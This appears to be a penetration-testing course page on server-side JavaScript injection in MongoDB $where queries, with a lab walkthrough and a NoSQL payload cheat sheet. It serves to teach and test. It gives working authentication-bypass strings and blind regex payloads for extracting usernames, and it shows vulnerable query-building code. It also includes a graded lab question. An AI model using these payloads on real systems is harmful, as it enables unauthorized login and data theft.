Introduction to NoSQL Injection

Server-Side JavaScript Injection

Theory

One type of injection unique to NoSQL is JavaScript Injection. This is when an attacker can get the server to execute arbitrary JavaScript in the context of the database. JavaScript injection may, of course, be in-band, blind, or out-of-band, depending on the scenario. A quick example of this would be a server that used the $where query to check username/password combinations:

...
.find({$where: "this.username == \"" + req.body['username'] + "\" && this.password == \"" + req.body['password'] + "\""});
...

In this case, user input is used in the JavaScript query evaluated by $where, leading to JavaScript injection. An attacker could do many things here. For example, to bypass authentication, they could pass " || ""==" as the username and password so that the server would evaluate db.users.find({$where: 'this.username == "" || ""=="" && this.password == "" || ""==""'}) which results in every document being returned and presumably logging the attacker in as one of the returned users.

MangoOnline

In this section, we will be looking at the fourth web application - MangoOnline. This application is vulnerable to Server-Side JavaScript Injection.

The site itself is just a login form with nothing else to look at.

Authentication Bypass

We can fill out the form with arbitrary data and intercept the login request to take a better look. The request looks similar to the one for MangoMail from the authentication bypass section.

If we try the same authentication bypass methods as before, however, we will, unfortunately, realize none of them work. At this point, we might want to check if some SSJI payloads work in case the server is running a $where query, which might look like this:

db.users.find({
    $where: 'this.username === "<username>" && this.password === "<password>"'
});

For this example, we could set username to " || true || ""==", which should result in the query statement always returning True, regardless of what this.username and this.password are.

db.users.find({
    $where: 'this.username === "" || true || ""=="" && this.password === "<password>"'
});

Since this is just JavaScript that is being evaluated, we can verify that the statement should always return true by using the developer console in our browser:

As expected, the statement returns True, even with this.username and this.password being undefined. With this confirmation, we can try to log in with this "username" and an arbitrary password, taking care to URL-encode the necessary characters.

This should result in us being able to bypass authentication altogether since the $where query returned True on all documents.

Note that the real username of whoever we logged in (whichever document we matched) is not displayed. Rather the SSJI payload we used is.

Blind Data Extraction

So we proved that we can bypass authentication with Server-Side Javascript Injection, and we have established that the username of the user we logged in as is not given to us, so let's work on extracting that information!

The steps to do this are essentially the same as the steps from the Blind Data Extraction and Automating Blind Data Extraction sections, simply with different syntax.

As a first request, we can use the payload: " || (this.username.match('^.*')) || ""==" to verify that there is a username which matches ^.*. This is expected to return true (log us in), so it's more of a sanity check.

Next, we can start guessing what the first character of the username is with payloads like: " || (this.username.match('^a.*')) || ""==". If no such username exists, as is the case with ^a.*, then the application will fail to log in.

After a bit of trying, the payload: " || (this.username.match('^H.*')) || ""==" logs us in, meaning there is a username that matches ^H.*.

By continuing these steps, we can dump the entire username.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

+ 6 There is a user in the system whose username starts with 'HTB{'. Follow the steps in this section to extract the next character of the username. What is the character?

+10 Streak pts

Previous Next

Go to Questions

Tools of the Trade

Defending against NoSQL Injection

Preventing NoSQL Injection Vulnerabilities

Skills Assessment

Skills Assessment I Skills Assessment II

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

MongoDB Usage

Connect to MongoDB: mongosh mongodb://127.0.0.1:27017
List databases: show databases
List collections: show collections
Insert data: db.collection.insertOne({...})
Insert lots of data: db.apples.insertMany([{...},{...},...])
Selecting data: db.collection.find({...})
Selecting one piece of data: db.collection.findOne({...})
Update (one) document: db.collection.updateOne({...}, {...})
Update multiple documents: db.collection.updateMany({...}, {...})
Delete document(s): db.apples.remove({...})

Query Operators

Type	Operator	Description	Example
Comparison	`$eq`	Matches values which are `equal to` a specified value	`type: {$eq: "Pink Lady"}`
Comparison	`$gt`	Matches values which are `greater than` a specified value	`price: {$gt: 0.30}`
Comparison	`$gte`	Matches values which are `greater than or equal to` a specified value	`price: {$gte: 0.50}`
Comparison	`$in`	Matches values which exist `in the specified array`	`type: {$in: ["Granny Smith", "Pink Lady"]}`
Comparison	`$lt`	Matches values which are `less than` a specified value	`price: {$lt: 0.60}`
Comparison	`$lte`	Matches values which are `less than or equal to` a specified value	`price: {$lte: 0.75}`
Comparison	`$nin`	Matches values which are `not in the specified array`	`type: {$nin: ["Golden Delicious", "Granny Smith"]}`
Logical	`$and`	Matches documents which `meet the conditions of both` specified queries	`$and: [{type: 'Granny Smith'}, {price: 0.65}]`
Logical	`$not`	Matches documents which `do not meet the conditions` of a specified query	`type: {$not: {$eq: "Granny Smith"}}`
Logical	`$nor`	Matches documents which `do not meet the conditions` of any of the specified queries	`$nor: [{type: 'Granny Smith'}, {price: 0.79}]`
Logical	`$or`	Matches documents which `meet the conditions of one` of the specified queries	`$or: [{type: 'Granny Smith'}, {price: 0.79}]`
Evaluation	`$mod`	Matches values which divided by a `specific divisor` have the `specified remainder`	`price: {$mod: [4, 0]}`
Evaluation	`$regex`	Matches values which `match a specified RegEx`	`type: {$regex: /^G.*/}`
Evaluation	`$where`	Matches documents which `satisfy a JavaScript expression`	`$where: 'this.type.length === 9'`

Authentication Bypass / Data Exfiltration Payloads:

URL-Encoded

param[$ne]=x
param[$gt]=
param[$gte]=
param[$lt]=~
param[$lte]=~
param[$regex]=.*

JSON

{param: {$ne: 'x'}}
{param: {$gt: ''}}
{param: {$gte: ''}}
{param: {$lt: '~'}}
{param: {$lte: '~'}}
{param: {$regex: '.*'}}
{param: {$nin: []}}

Blind NoSQLi Payloads:

URL-Encoded

param[$regex]=^XYZ.*$

JSON

{param: {$regex: '^XYZ.*$}}